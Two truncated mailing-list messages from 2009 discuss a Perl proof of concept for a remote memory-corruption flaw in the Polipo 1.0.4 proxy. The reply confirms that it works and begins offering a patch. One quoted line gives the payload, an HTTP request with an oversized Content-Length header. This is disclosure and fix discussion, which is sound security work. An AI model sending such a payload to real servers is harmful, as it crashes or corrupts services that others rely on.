Re: polipo POC

2009-12-09 Thread Jacob Appelbaum
Darren Thurston wrote: > > #!/usr/bin/perl > # estranged.pl > # AKA > # Polipo 1.0.4 Remote Memory Corruption 0day PoC Cute. > $payload = "GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n"; > The proof of concept works as advertised. Wheee. Here's a simple patch (that probably breaks some

polipo POC

2009-12-08 Thread Darren Thurston
#!/usr/bin/perl # estranged.pl # AKA # Polipo 1.0.4 Remote Memory Corruption 0day PoC # # Jeremy Brown [0xjbrow...@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 12.07.2009 # # * # # Hzzp